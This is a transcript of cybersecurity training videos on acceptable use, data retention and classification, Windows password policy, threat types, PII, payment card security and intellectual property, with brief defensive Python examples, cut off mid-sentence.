[Topic title: Acceptable Use Policy. The presenter is Dan Lachance.] In this video, we'll talk about Acceptable
Use Policy. Organizations will have numerous security policies related to how business processes are to be
conducted within the company and also how IT systems are to be used. So the Acceptable Use Policy then is
part of the overall organizational security policy. Now user training and awareness is crucial in order to make
this information known to employees within the company. There needs to be user acknowledgement of
acceptable use policies for IT systems during the employee on-boarding process, when they're newly hired.
We might also consider the use of logon banners on our devices on the network, including Windows and Linux
workstations, so that prior to user logon, there is a banner or an alert that pops up that states something to the
effect that the machine should only be used for business purposes. So the proper use of IT systems then within
the company is part of the Acceptable Use Policy.
The Acceptable Use Policy is a document. And you should really make sure you involve legal counsel when
structuring this for an organization. So, an example of this, in terms of a structure, would be having a purpose
of the Acceptable Use Policy, which normally is to protect employees and business interests, and then the scope of
it. For example, we might have an e-mail acceptable use policy versus a VPN acceptable use policy.
Then, of course, it would define unacceptable use. In the case of e-mail, that would include harassment of any kind
sent to others through the e-mail messaging system. There would also need to be a section that lists
consequences. And in the case of e-mail unacceptable use, it might be suspension from work. Of course, there
needs to be a definition of terms like there would be in any type of longer document, especially a legal
document.
The e-mail acceptable use policy might include things like no harassment, including sexually harassing e-mail
messages or anything involving racial slurs through e-mail. The Internet acceptable use policy might include
things such as no visiting of pornographic sites. Social media acceptable use policies might prohibit the use of
Facebook or Twitter and other social media. However, in some cases, maybe it's only allowed during breaks.
The consequences – there could be legal prosecution in some cases. It depends on the nature of the infraction.
So, for example, adults viewing adult pornography is technically not illegal in most parts of the world, but
obviously it's unprofessional at work. So even though they might be suspended or demoted or potentially lose
their job, there might not be any type of legal prosecution beyond that.
In this video, find out how to identify details within data ownership and retention policies.
Objectives
[Topic title: Data Ownership and Retention Policy. The presenter is Dan Lachance.] In this video, I'll discuss
data ownership and retention policy.
Data ownership relates to intellectual property or IP. Now, at the industrial level, this would include things
such as – patents and trademarks. At the artistic level, it would include things like musical compositions, films,
and artworks that are protected by copyright.
Fair use means that we can use an excerpt of intellectual property while giving attribution to the owner or
creator. So, for example, we might have a search result in a search engine that shows a thumbnail of a
copyrighted image, but not the full size or full scale picture. We also have to think about where data is being
stored when it comes to intellectual property. Whether it's stored on-premises or in the cloud, and what laws or
regulations apply to the data where it's stored.
There are then archiving requirements for data retention. Now there might be laws or regulations in our
specific industry that dictate how long we must keep certain types of records for. Data backups deal with the
storage location which might have to be on-premises or off-site elsewhere like the storage of off-site tapes, or
they could be stored in the public cloud.
Now, in some cases, storage of data in the public cloud could be prohibited unless the public cloud provider
has a data center in the country of origin of that same data and as long as it's staffed by personnel who are
residents of that same country. So it's very important that you get legal advice when determining where to store
sensitive data, especially if it relates to customers – whether it's health information, financial information,
address information, and so on.
We also have to consider the cost that's related to data storage be it on-premises or in the cloud especially
when it's being retained for periods of time. Legal discovery can be difficult without a comprehensive data
retention policy. E-discovery is a term that relates to the electronic discovery of digital data that could be used
in court proceedings.
Often with data retention, it's policy-driven automation that categorizes and migrates data that is no longer
considered to be live and needed right now and stores it instead in long-term storage. Now often, and this is
true also on the public cloud, long-term storage is slower. So it might be older magnetic hard disks as opposed
to the faster solid-state drives. And as such it's cheaper.
So even most public cloud providers will charge a lesser rate to store things long-term for archiving than to
store data that's frequently accessed. The proper disposal of sensitive data after the retention period has been
exceeded is crucial. So again there might be regulations that require certain data sanitization techniques to be
applied to make sure no data remnants remain.
In this video, learn how to identify details within data classification policies.
Objectives
[Video description begins] Topic title: Data Classification Policy. The presenter is Dan Lachance. [Video
description ends]
In this video, I'll go over data classification policy. Data integrity relates to how trustworthy and authentic data
is considered. This can be assured in various ways. At the technical control level, file hashing is used to take
the unique bit-level data and apply it against an algorithm that results in a unique value. That unique value is
called a hash. Now when we run that algorithm against that same data in the future, if there's a change, the
hash value will be different. So we'll know that something has changed.
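Just to make that concrete – this is a minimal sketch of my own, not something shown in the video – a file hash can be computed with a few lines of Python using the standard hashlib module; the file name is only a placeholder.

import hashlib

def file_sha256(path):
    """Return the SHA-256 hash of a file, reading it in chunks."""
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()

# Compare a stored hash with a freshly computed one to detect any change.
original_hash = file_sha256("Contract_A.rtf")   # placeholder file name
# ... later ...
if file_sha256("Contract_A.rtf") != original_hash:
    print("Integrity check failed: the file has changed.")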
Administrative controls, including things like separation of duties can also assure data integrity or business
process integrity. Separation of duties ensures that no single person has control of an entire business process
from beginning to end, especially as it relates to IT and security. Mandatory vacations not only ensure that
people are refreshed; while they're on vacation, the people filling their roles will be able to notice any anomalies if
there are any – and not only anomalies, but also inefficiencies in how things are done. Change management processes are a
structured and organized way to apply changes in an organization. Now as it relates to IT, it's important that
this be outlined and known to related personnel so that changes are applied in a controlled manner and we have
a way to roll back out of changes if there's a problem. Dual control requires that at least two people be present
in order to complete a process.
So, for example, if our data backups are encrypted, we might require two technicians to be present – each
having a part of a decryption key. And when those two parts are put together, we have the single key that's
required to decrypt that backup.
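Here's a minimal sketch of that split-key idea – my own illustration, not anything shown in the video – where a key is split into two shares so that neither technician's share reveals anything on its own and both are required to rebuild the key.

import os

def split_key(key: bytes):
    """Split a key into two XOR shares; each share alone reveals nothing."""
    share1 = os.urandom(len(key))
    share2 = bytes(a ^ b for a, b in zip(key, share1))
    return share1, share2

def combine(share1: bytes, share2: bytes) -> bytes:
    """Recombine the two shares to recover the original key."""
    return bytes(a ^ b for a, b in zip(share1, share2))

key = os.urandom(32)            # e.g. a 256-bit backup encryption key
s1, s2 = split_key(key)         # give one share to each technician
assert combine(s1, s2) == key   # both shares are required to decrypt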
Cross-training can also be very important. In the IT world, technicians are used to reducing single points of failure,
whether that's in a power supply, at the disk level, the server level, and so on. At the personnel level, with
cross-training we've got more than one person who is able to perform a duty, so that if one person is unable to perform
it, or if they leave the organization or are busy on another project, we've got somebody else who can perform that task.
Succession planning is also crucial so that we have someone in mind whom we train over time to fill the shoes of
somebody who will be moving on to other departments, other projects, or even perhaps moving into retirement. A data classification policy
identifies different types of data. Now why would we want to do that? Why can't all data be treated the same?
Well, some data is more sensitive than other data. And so, with the data classification policy, we might look
into database records or files to determine if there is something sensitive like financial transactions, health
records, whether records or files contain Personally Identifiable Information or PII. Things like e-mail
addresses or social security numbers – that's all considered PII. And in some cases, we might be required, due
to regulations or laws, to encrypt data that is considered sensitive. Also, this data classification can be related
to data retention requirements. So perhaps data that is not considered PII – Personally Identifiable Information
– doesn't need to be retained. Whereas financial transactions, due to the industry we're in might need to be
retained for a number of years.
So this is an ongoing task. The reason is that as new records or new files get placed on a file server, they need to
be classified. So we need some way to determine whether that new data contains financial information, health
information, and so on, and classify it accordingly. So, if it's got financial information in it, it should be classified
in some way that we can identify, and that classification would go along with our data retention of financial
information for numerous years. We can automate data classification.
It's not as if somebody has to be watching for any new or changed database records or files to flag them
manually.
So we can automate the classification through metadata tagging. Metadata is extra information that gets stored
with existing data. As an example, Microsoft's File Server Resource Manager is a role service in the Windows
Server Operating System that does just this. Let's go take a look at it right now. On my file server, I've gone to
Local Disk (C:) into the Contracts folder where I've got a file called Contract_A. Now, if I right-click on a file
here in the Windows Server OS and go to the Properties option, if there's a Classification tab visible
[Video description begins] The Contract_A Properties dialog box is open. It includes tabs such as General,
Classification, Security, and Details. [Video description ends]
– and there may not be – it means that the File Server Resource Manager role service is installed.
[Video description begins] He clicks the Classification tab. Under this, there are two sections. The first section
displays the added property's name and value. In this, the Department property is added with the Value
(none). The second section is Value. It displays the values and their description that can be added to a
property. [Video description ends]
So clearly it's installed here. So I'm going to Cancel all of that. On my server I'm going to go to my Start button
and look for file server. And what I want to do here is run the File Server Resource Manager tool. Now this
does numerous things,
[Video description begins] The File Server Resource Manager window opens. It is divided into three sections.
The first section is navigation pane. In this, the File Server Resource Manager (Local) node is selected by
default. It includes subnodes such as Quota Management, File Screening Management, and Classification
Management. The second section displays the information on the basis of the selection made in the first
section. The third section includes the File Server Resource Manager expandable node. [Video description
ends]
but we're only interested here in Classification Management. So I'm going to click under Classification
Management on the left, on Classification Properties. Now over on the right, I see any existing Local
properties that are tied to
[Video description begins] In the navigation, under the Classification Management subnode, he clicks the
Classification Properties option. As a result, its information is displayed in the second section. The second
section displays the information of local properties in a tabular format. The table provides information
regarding the Scope, Usage, Type, and Possible Values of the local properties. [Video description ends]
the specific server that can be used to flag files and any Global ones come from Active Directory. For example
here, there's a Department Global property that we can use to flag files and tie them to a department. Now we
can also build our own properties. If I were to right-click on Classification Properties on the left, I could
choose to Create Local Property. I'm going to make one here called FinancialData.
[Video description begins] The Create Local Classification Property dialog box opens. It contains a General
tab. Under this, there are the following fields: Name and Description, which are text boxes and Property type,
which is a drop-down list box. In the Name text box, he enters FinancialData. [Video description ends]
Down below for the Property type, I'm going to choose Yes/No. So either it is or is not financial data. But
notice I've got other data types here like Number, Multiple Choice List, String, and so on. Then I'm going to
click OK. And notice that the FinancialData Local property now shows up in the list.
[Video description begins] The FinancialData property gets added to the table of the local properties. [Video
description ends]
Let's go back to our file. So I'm going to switch back to the Windows Explorer tool. I'm going to right-click on
the Contract_A file again and go back into Properties. And under Classification, notice that we've got both
Department and FinancialData available here. So Department for instance is selected.
[Video description begins] The Contract_A Properties dialog box opens again. Under the Classification tab,
Dan refers to the FinancialData property that gets added in the first section under the Description
property. [Video description ends]
And down below, I can choose which department that this file might be tied to. Now of course, I'm doing this
manually. We'll talk about the automation in a moment. So maybe this is related to the Finance department. So
up above, we see Department equals now Finance.
[Video description begins] He selects the Department property in the first section. Then in the Value section,
he selects Finance. This value gets added in the first section against the Description property. [Video
description ends]
For FinancialData, I can choose a Yes, No, or None value. So again, I'm doing this manually. But, if I
deem that there is financial data stored in this document, I would choose Yes.
[Video description begins] He selects the FinancialData property in the first section. In the Value section,
three radio buttons appear: Yes, No, and None. He selects the Yes radio button. [Video description ends]
So we can now see the file is flagged for the Finance department. And yes, it does have FinancialData. So I'm
going to click OK. But what about automating that? Well, let's go back to the File Server Resource Manager.
On the left, I'm going to right-click on Classification Rules to create one.
[Video description begins] The File Server Resource Manager window opens again. Under the Classification
Management subnode, he right-clicks the Classification Rules option. As a result, a shortcut menu appears
from which options can be selected. He selects the Create Classification Rule option. [Video description ends]
[Video description begins] The Create Classification Rule dialog box opens. It includes various tabs such as
General, Scope, and Classification. Under the General tab, in the Rule name text box, he enters Rule1. [Video
description ends]
And under the Scope tab, down below, I'm going to click Add. I have to tell it where I want to scour or scan
the file server looking for files that might be considered financial data files. So I'm going to tell it to scan drive
C. Then, under the Classification tab, I'm going to make sure it's set to Content Classifier. And down below I'm going
to click the Configure button.
[Video description begins] He clicks the Classification tab. Under this, there are two sections: Classification
method and Property. The Property section includes the Configure button. [Video description ends]
What I'm going to look for here is a String value within files.
[Video description begins] The Classification Parameters dialog box opens. It contains the Parameters tab.
Under this, there are the following two sections: Specify the strings or regular expression patterns to look for
in the file or file properties and File name pattern (optional). In the first section, the content is displayed in a
tabular format with no entries. The following column headers are displayed: Expression Type, Expression,
Minimum Occurrences, and Maximum Occurrences. Under the Expression Type column header, there is a
drop-down list box. [Video description ends]
Let's say that if it's got usd for U.S. dollars, I consider that to be a financial file.
[Video description begins] Under the Expression Type column header, he selects the String option from the
drop-down list. Under the Expression column header, he enters usd. [Video description ends]
We could get much more detailed than that with our expression, but that's what we're going to go with in this
example. So I'm going to click OK. Now, when we do find files on drive C that contain USD, I want to flag them
as FinancialData equals Yes. I'll choose that from here.
[Video description begins] He switches back to Create Classification Rule. Under the Classification tab, in the
Property section, there are two fields: Choose a property to assign to files and Specify a value. Below the first
field, there is a drop-down list box, he selects the FinancialData option. As a result, in the second field, the
Yes option gets auto filled. [Video description ends]
And then I'll click OK. Now at any point in time over on the right in the Actions panel, you see you can Run
Classification With All Rules. That's still manual. What I could do is Configure Classification Schedule. So I
could enable a schedule,
[Video description begins] In the Actions section, he clicks the Configure Classification Schedule option. As a
result, the File Server Resource Manager Options dialog box opens. It includes various tabs such as Email
Notifications, and Automatic Classification. The Automatic Classification tab is selected by default. It includes
the Schedule section which contains an Enable fixed schedule checkbox. [Video description ends]
determine which days of the week I want this to run on and at what time, and it will run my classification rules
for me. Data classification can also go hand in hand with authentication. So how people authenticate can
determine what type of data they'll be able to get to. For example, sensitive data might require Multi-Factor
Authentication and otherwise be unavailable to users. Role-based access to data is very common, where we limit
data access to job roles on a need-to-know basis. This is most often implemented through the use of groups that
might have permissions to files flagged as being FinancialData. In this video we
talked about data classification policy.
[Topic title: Password Policy. The presenter is Dan Lachance.] In this video, we'll take a look at password
policy. Password policies are important and they're defined within an organization to determine things like
how long passwords can exist before they need to be changed, how complex passwords need to be, and so on.
Here, on Windows Server 2012, let's take a look at Group Policy, where we can centrally define password
settings for all users in the Active Directory domain. To begin, I'll click on the Start button and I'll type in
group. Now when the Group Policy Management tool pops up, I'll go ahead and click on that to start it. Now
once we're in the Group Policy Management tool [The Group Policy Management window opens. It is divided
into two sections. The first section is navigation pane. The second section displays the information on the basis
of the selection made in the first section. In the first section, under the Group Policy Management expandable
node, there is Forest:fakedomain.local subnode. Under this subnode, there is Domains subnode. Under this,
there is fakedomain.local subnode. Under this subnode, there is Default Domain Policy option. Its information
is displayed in the second section.] in the left-hand navigator, I'm going to right-click on the Default Domain
Policy, GPO or Group Policy Object. And I'm going to choose Edit.
Here within the Default Domain Policy on the left, [Now the Group Policy Management Editor window opens.
It is also divided into two sections. This time in the navigation pane, under the Default Domain Policy
[SRV2012-1.FAKEDOMAIN.LOCAL] Policy expandable node, there are the following two subnodes:
Computer Configuration and User Configuration.] I'm going to go down under Computer
Configuration. [Under the Computer Configuration subnode, there are the following two subnodes: Policies
and Preferences.] So I'm going to expand Policies. Then I'm going to expand Windows Settings. And finally
under that, I'll open up Security Settings. Now this is where we're going to see Account Policies. And, if I even
expand that, finally it reveals the Password Policy. If I select that on the right, I see all the individual settings
like Enforcing password history.
Here it's set to remember the last 24 passwords. So the idea here is we don't let people reuse passwords
because that essentially means the same password is in effect for longer periods of time which reduces security
for that user account. Here the Maximum password age is currently set to 42 days. [In the second section, Dan
clicks the following individual setting: Maximum password age. As a result, the Maximum password age
Properties dialog box opens. It contains two tabs: Security Policy Setting and Explain. Under the Security
Policy Setting, there is the following field: Password will expire in.] I'm going to set that to 30 so that we
require password changes every 30 days for security.
I'm going to set the Minimum password age to 10 days [He repeats the same procedure for the next individual
setting which is Minimum password age.] because I don't want people immediately changing their password to
some variation of what they used before because it's easier for them to remember. The Minimum password
length here – I'm going to bump up to 8 characters for security reasons. I can also ensure that password
complexity requirements are enabled so that we've got to use things like uppercase and lowercase characters
and so on.
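As an aside – this is my own sketch, not part of the Group Policy demo – roughly the same policy could be expressed in a few lines of Python, for example to pre-check passwords in a provisioning script. Windows' actual complexity rules are a bit more involved, so treat this only as an approximation.

import re

def meets_policy(password: str, min_length: int = 8) -> bool:
    """Approximate check: minimum length plus at least three character classes."""
    if len(password) < min_length:
        return False
    classes = [
        re.search(r"[a-z]", password),          # lowercase letter
        re.search(r"[A-Z]", password),          # uppercase letter
        re.search(r"[0-9]", password),          # digit
        re.search(r"[^a-zA-Z0-9]", password),   # symbol
    ]
    return sum(1 for c in classes if c) >= 3

print(meets_policy("Summer2024!"))  # True
print(meets_policy("password"))     # False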
The other important thing to bear in mind here is that we've done this in the Default Domain Policy. [He
switches back to the Group Policy Management window.] Even though you can build other GPOs in Active
Directory that might apply to other organizational units, and they will let you configure the Password Policy
settings, those settings don't take effect. So the only way that we can set standard Password Policy settings for
everyone inside an Active Directory domain is by doing it in a domain-level policy. It will not work in a GPO
linked to an OU; even though it looks like it will, if you test it, it will not.
After completing this video, you will be able to recognize various network configurations and perform network
reconnaissance.
Objectives
Exercise Overview
[Topic title: Exercise: Network Architecture and Reconnaissance. The presenter is Dan Lachance.] In this
exercise, you'll begin by explaining why IPv6 is considered more secure than IPv4. You'll then explain why
DMZs are relevant. Then you'll outline the Cloud Security options. You will list the differences between log
review and packet captures. And finally, you'll list differences between data retention and data classification.
Now pause the video and perform each of these exercise steps and then come back here to view the results.
Solution
IPv4 was never designed from its inception in the 1970s with security in mind. So all security solutions that
exist today for IPv4 are essentially afterthoughts and Band-aids. IPv6 was designed with security in mind. It
has built-in support for IPsec. IPsec is actually a requirement. IPsec also works with IPv4.
A DMZ is a demilitarized zone. It's a special network segment that sits between the Internet and an internal
network. An external firewall protects the DMZ from the Internet. And an internal firewall protects the internal
network from the DMZ. IT services that need to be publicly visible should always be placed on the DMZ.
When it comes to the cloud, there are a couple of security options available.
We have on-premises connectivity to the cloud from our local network or our data center. This can be done
through a site-to-site VPN which encrypts the connection or a dedicated leased line which bypasses the
Internet. On the encryption side, there are encryption options for data in transit – so data being transmitted as
well as data at rest – data being stored. We can also encrypt data prior to storing it in the cloud using any
encryption tools that we choose.
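To illustrate that last point – this is a hedged sketch using one possible tool, not something specified in the course – a file could be encrypted client-side with Python's cryptography package before it ever leaves the premises; the file names are placeholders.

from cryptography.fernet import Fernet   # pip install cryptography

key = Fernet.generate_key()   # keep this key on premises, never with the cloud provider
f = Fernet(key)

with open("customer_report.xlsx", "rb") as src:          # placeholder file name
    ciphertext = f.encrypt(src.read())

with open("customer_report.xlsx.enc", "wb") as dst:
    dst.write(ciphertext)     # upload only the encrypted file to the cloud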
Some cloud providers also offer security as a service in the cloud – things like firewalling, spam
filtering, and virus scanning. Log review and packet capturing are different from one another, although
they're both forms of reconnaissance. Logs result from the operation of an operating system or an app,
or they could be the result of activity auditing. And logs can and should be forwarded to other hosts for safekeeping,
especially for devices that exist in a DMZ.
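As a small illustration of that forwarding idea – assuming a reachable syslog collector whose host name here is purely a placeholder – Python's standard logging module can ship log records off the local host.

import logging
import logging.handlers

# Forward log records from a DMZ host to a central syslog collector.
logger = logging.getLogger("dmz-web-server")
logger.setLevel(logging.INFO)
handler = logging.handlers.SysLogHandler(address=("logs.example.internal", 514))  # placeholder host
logger.addHandler(handler)

logger.warning("Repeated failed logons detected from 203.0.113.55")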
Packet captures, on the other hand, are a copy of network transmissions that can be used to troubleshoot
performance issues as well as to establish a baseline of normal network activity. Data retention is related to
archiving requirements for long-term storage of data that needs to be around. This could be due to legal or
regulatory reasons and it's related to our data backup policy.
Data classification allows us to identify different types of data. Usually this is done by adding metadata, for
example – to files stored on a file server, we might add additional attributes such as the department or project
it's tied to. It's designed for the protection of sensitive information. So certain permissions can be granted to
certain classifications of data. So the two therefore – data retention and data classification – are related.
During this video, you will learn how to identify assets and related threats.
Objectives
[Topic title: Threat Overview. The presenter is Dan Lachance.] In this video, I'll do a threat overview.
According to ISO document 7498-2, a threat is defined as being a potential violation of security. And, as
cybersecurity analysts, it's our job to be able to identify assets and threats to them and to put in place security
controls that can mitigate or completely remove that possibility of threat materialization.
The first thing we have to consider is what are assets? What has value to the organization? Now that can
include numerous things including IT systems that the company relies on, or it could be specific data like
customer shopping habits data. Then we have to look at what type of data is the most valuable, because many
organizations produce many different types of data. So we have to think about the IT systems that produce the
data and then the process workflow that results in the data.
So that might mean, for example, a certain web application that employees follow through a specific process to
fill in a form to submit data that ends up resulting in something of value to the organization. Maybe it's in the
accounts payable department or accounts receivable. Asset examples include things like Personally Identifiable
Information or PII. This is any type of information that uniquely identifies an individual, things like an e-mail
address, their financial history, their social security number, and so on.
Then there's corporate data that might be considered confidential. Certainly, things like accounting data would
fall under that category. Data regarding mergers and acquisitions, trade secrets. There's also intellectual
property or IP. And this could be related to industrial processes or methods. Or it could be artistic such as
copyrights for artwork or for music.
Other assets include payment card information. So, if we deal with cardholder data whether they are debit
cards or credit cards, that data has to be stored in a secured manner and transmitted securely. And as such, it
could be very important for an organization to safeguard that type of information. Realized threats will have a
negative effect on business operations. Now this comes in a number of ways such as loss of revenue, such as
when we get malware infections that bring IT systems down for a period of time. It can also include things like
loss of reputation, loss of consumer confidence.
Sources of these threats include malware; social engineering, which is trickery – tricking someone into divulging
something sensitive; or some other type of security breach such as a physical security breach. Other
threats include natural disasters like floods or storms, which might result in power outages, and of course other
man-made threats such as war and terrorism.
Data needs to be categorized for it to be taken care of properly so that we can mitigate threats against it. Data
categorization uses metadata. Metadata is extra information about the actual data itself. So we could manually
configure metadata about documents stored, for instance, on a Microsoft SharePoint Server where we might
select items from a drop-down list maybe to flag a document as being at a certain stage within a business
process.
We could also look at automated solutions like Windows File Server Resource Manager – FSRM. For
example, we might have files that we look at and, if they contain credit card numbers we would flag them as
sensitive. Now, whether we're talking about solutions like SharePoint Server or FSRM, they could both be
manual or automated. We categorize data because then job-based roles allow appropriate access to this
categorized data.
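To give a feel for how automated flagging might recognize a credit card number – this is purely an illustrative sketch of the general idea, not how FSRM or SharePoint work internally – a scanner could look for digit runs that pass the Luhn checksum used by payment cards.

import re

def luhn_valid(number: str) -> bool:
    """Return True if the digit string passes the Luhn checksum."""
    digits = [int(d) for d in number][::-1]
    total = 0
    for i, d in enumerate(digits):
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0

def looks_like_card_data(text: str) -> bool:
    """Flag text containing a 13- to 19-digit run that passes the Luhn check."""
    return any(luhn_valid(m) for m in re.findall(r"\b\d{13,19}\b", text))

print(looks_like_card_data("Invoice paid with card 4111111111111111"))  # True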
After completing this video, you will be able to recognize known, unknown, persistent, and zero-day threats.
Objectives
So then we take a look at the impact on business operations, business processes, including relevant data. This
way we can focus on selecting the best mitigating security controls to reduce the impact of potential risks.
Known threats include things like viruses that have a known signature that can be detected by a malware
scanner. Another example of a known threat is a firewall misconfiguration. Ideally, we will know about it
before it's known by malicious users that can then take advantage of that firewall misconfiguration.
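As a toy illustration of signature-based detection – real malware scanners use far richer signatures than whole-file hashes, so this is only a sketch – a scanner could compare a file's hash against a set of known-bad hashes; the hash value below is a placeholder.

import hashlib

KNOWN_BAD_SHA256 = {
    "275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f",  # placeholder entry
}

def is_known_threat(path: str) -> bool:
    """Return True if the file's SHA-256 hash appears in the blocklist."""
    with open(path, "rb") as f:
        digest = hashlib.sha256(f.read()).hexdigest()
    return digest in KNOWN_BAD_SHA256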
Unknown threats are called zero-day threats when it comes to malware. This means we've got some kind of an
exploit that's available, but the vendor doesn't yet know about it. Malicious users, however, do. They may or
may not require the deployment of malware to actually exploit this vulnerability. So, for example, it would be
a weakness in an operating system that still isn't known to the vendor.
APT stands for advanced persistent threat. Essentially, it involves a back door. Now a back door allows an alternative
way to get into a system. It's often built by developers during development phases to allow them to quickly
get in and test something while bypassing access control mechanisms. The problem is that sometimes those back doors
aren't removed, or they could be put in place by malicious software. So, essentially, this would allow attackers to use a
compromised system for a long period of time. And this has happened in the past.
Think about Nortel, for example, where Chinese hackers had compromised their network and been in for
almost a decade. Let's take a look at a threat classification criteria example. So the first thing we have to
consider is the threat source. In this case, let's assume it's external. We then have to think about the threat
agent. How is that being delivered – that threat? How is it being materialized? And in our example, let's say it's
ransomware. Now ransomware is a form of malware that encrypts files and then demands payment to reveal a
decryption key.
So what would the threat motivation be? Because that's the next idea we have to think about. In this case, it
would be financial – receiving a payment and ideally providing a decryption key to the victim after receiving
the payment. The next thing to consider when classifying threats is the threat intention. Is it malicious as is the
case with ransomware where the motivation is financial or is it some kind of an accident?
The next thing we have to think about is the impact that the threat will have against business processes, IT
systems, and data. So will there be any downtime? Will we have denial of service to an IT system that
otherwise would be available for legitimate use? Will we have data disclosure to unauthorized parties or will
there perhaps be illegal use of sensitive information such as Personally Identifiable Information or PII?
So it's important that we categorize and prioritize threats and think about all of the criteria related to threats.
[Topic title: Personally Identifiable Information. The presenter is Dan Lachance.] In this video, I'll discuss
Personally Identifiable Information. In the IT field, Personally Identifiable Information is simply called PII or
P-I-I. These are unique attributes that are related to an individual. PII is stored with some kind of agency or
institution or private sector firm. And there are laws and regulations in place in different industries and
different parts of the world for protection of PII.
One standard is that PII owners must be notified that their personal information is being collected. They also
must be notified about how it's going to be used. Examples of PII include personal information such as a
person's full name, their birthdate, their driver's license number, Social Security Number, e-mail
address, their mother's maiden name, and anything related to biometrics like a fingerprint scan or a retinal
scan.
PII harvesting, for example, would be used to trick victims into updating passwords on a fraudulent web site.
So the harvesting part comes in because the malicious user is reaping the rewards of somehow tricking people
into divulging sensitive personal information. And often, this could come in the form of an e-mail message that
looks like a legitimate message from the bank asking a user to reset their password, for instance.
The best defense here is user training. User training should emphasize the problems that can occur with e-mail
file attachments, especially those that the user was not expecting, but there are even risks with opening file
attachments a user was expecting. Of course, links to other web sites in e-mail messages should always be
treated very cautiously. Links posted on social media sites, whether it's Twitter or Facebook,
especially if they relate to an individual, might also be a way to lure a user into clicking, often due to human
curiosity. And then once that happens, the machine could be infected.
PII falls under organizational data classification rules. So, for example, we might configure a PII
confidentiality impact level of low, medium, or high depending on the content within database records or files
on a file server. PII can be stored on premises. And depending on rules or regulations and laws about how that
PII is treated, when it's on premises it might need to be encrypted. There might need to be backup copies stored
off site and so on.
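As a rough sketch of how file content could drive that impact level – my own example with simplified patterns, not a product feature from the course – a script might look for e-mail addresses and Social Security Number-like patterns and rate the content accordingly.

import re

EMAIL = re.compile(r"\b[\w.+-]+@[\w-]+\.[\w.]+\b")
SSN = re.compile(r"\b\d{3}-\d{2}-\d{4}\b")

def pii_impact_level(text: str) -> str:
    """Very rough rating: SSN-like patterns rate high, e-mail addresses medium, otherwise low."""
    if SSN.search(text):
        return "high"
    if EMAIL.search(text):
        return "medium"
    return "low"

print(pii_impact_level("Contact: jane.doe@example.com"))   # medium
print(pii_impact_level("SSN on file: 123-45-6789"))        # high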
In the cloud, we have to think about storage of PII where it might not be allowed due to laws and regulations.
Or if it is, it might be required on cloud provider data center equipment within national boundaries. And again,
encryption for data at rest or stored data is often associated with PII as well as while it's being transmitted.
PII owners, as we mentioned, must be notified of how their PII will be used. So, if their personal information is
going to be shared with other vendors within or outside of national boundaries, they must know about it and
they must consent to this usage.
After completing this video, you will be able to explain payment card data.
Objectives
[Topic title: Payment Card Information. The presenter is Dan Lachance.] In this video, I'll talk about Payment
Card Information. Payment card types include things like credit cards, debit cards, and gift cards to name a
few. It's important that there is consumer trust for this system to work – trust in the cards, the data stored on
them, and the systems that are used to pay for services and products. It's also very convenient for consumers
even across the Internet to use a payment card to purchase something. But with good things come bad things in
terms of malicious users.
Payment cards are a large portion of cybercrime, especially organized crime with different groups around the
world. For example, Carder's Market is a closed group on the Internet where things like credit card PINs and
PayPal account credentials are for sale to the highest bidder. Now, it's hard to believe that this would actually
exist on the Internet and anyone could connect from anywhere. But that's just it – not anyone can connect. You
have to be invited and there's very careful scrutiny by other members to make sure that it's not Law
Enforcement trying to infiltrate these groups. And often, payment for these types of nefarious items is done
through Bitcoin. That's because Bitcoin payments are largely unregulated. However, transactions are normally
publicly recorded on the blockchain. But, you know, there are ways around everything – this can be
circumvented by using a Bitcoin tumbler or an anonymizer.
Magnetic strip cards generally don't encrypt data transmitted to the terminal. But the reason I say generally is
because there are different proprietary solutions for strip cards and the terminal devices that they are used
against. But generally, it is not encrypted. Magnetic strip cards can contain any type of information, really. It
depends on what the creator decides to burn into the magnetic strip – things like the type of card, account
numbers, account types, the account holder name, perhaps an expiration date for the card, even a PIN, or a
hash of the PIN – but it varies.
Chip cards on the other hand are also called smart cards. And they do encrypt data transmitted to the terminal.
Chip cards are interesting because they actually contain a very thin microchip embedded within the card.
However, these aren't quite as widely used as the magnetic strip cards yet in all parts of the world, but it is
changing. The good thing about chip cards is they are much more difficult to forge than magnetic strip cards
are.
NFC stands for Near Field Communication. And this is a contactless payment mechanism that's becoming
more and more popular. It's a short-range wireless communication – approximately 20 centimeters maximum. And
this is one of the reasons why it can be difficult to intercept signals because someone would have to be very,
very close. However, it is possible.
There are also smartphone apps that allow you to use NFC for payment, and they will automatically take funds
out of a certain account through your bank or through your credit card and so on. Transmissions are
encrypted. However, this is one of those features – on a smartphone, for example – that you should disable if you
don't use it. That's part of hardening: turning off things that we don't use to reduce the attack surface.
PCI DSS stands for Payment Card Industry Data Security Standard. These are security standards that need to
be met by merchants, financial institutions, or point-of-sale vendors that work with cardholder data – whether
it's credit cards or debit cards and so on. So PCI DSS requirements include the use of network and host-based
firewalls configured properly. Configured properly means that a firewall by default should deny everything.
And you should only allow specific things that you know should be allowed into or out of a host or a network.
PCI DSS requirements also require hardening in the sense of changing system defaults like default passwords,
default names of wireless networks, and so on. Transmission of cardholder data must always be encrypted.
And in some cases, it will have to be encrypted as it's stored, as well. Another requirement is having up-to-date
antimalware solutions running on systems related to cardholder data and the use of unique user accounts at that
specific organization. So we can track who did what at what date and time.
Another requirement – and there are many beyond what we're listing here – would include restricted physical
access to cardholder data itself. Now that's where the encryption of data at rest kicks in. Because if by some
chance a malicious user gets physical access to cardholder data – if it's encrypted, that's yet another hurdle that
they must circumvent. And ideally, if it's strong encryption, they won't be able to crack it.
Another requirement is auditing, to track who's been doing what as it relates to cardholder information, along with
periodic security testing.
[Topic title: Intellectual Property. The presenter is Dan Lachance.] In this video, I'll talk about intellectual
property. Technicians often refer to intellectual property as IP, not to be confused with Internet Protocol. IP is
a type of data. At the industrial level, it would include things like trade secrets, patents, and trademarks. At the
artistic level, it relates to copyrights. Some examples of intellectual property would include things like secret
ingredients or recipes or music. Paintings also fall under intellectual property and it would be subject to
copyright law just like music would.
Scientific research and the results thereof are also considered intellectual property as are specific industrial
processes used by certain organizations, for example, in the manufacturing process. These are the types of
things that we would want to keep secret to remain competitive. Now there might be some intellectual property
ownership issues. Consider the example of university research data created through government funding that
finds some kind of important medical result.
Who owns that intellectual property – the university, the researchers, or the government that funded the
research? DRM stands for Digital Rights Management and this is another aspect of protecting intellectual
property. It prevents things like piracy. If you think back to the days of software being distributed on floppy
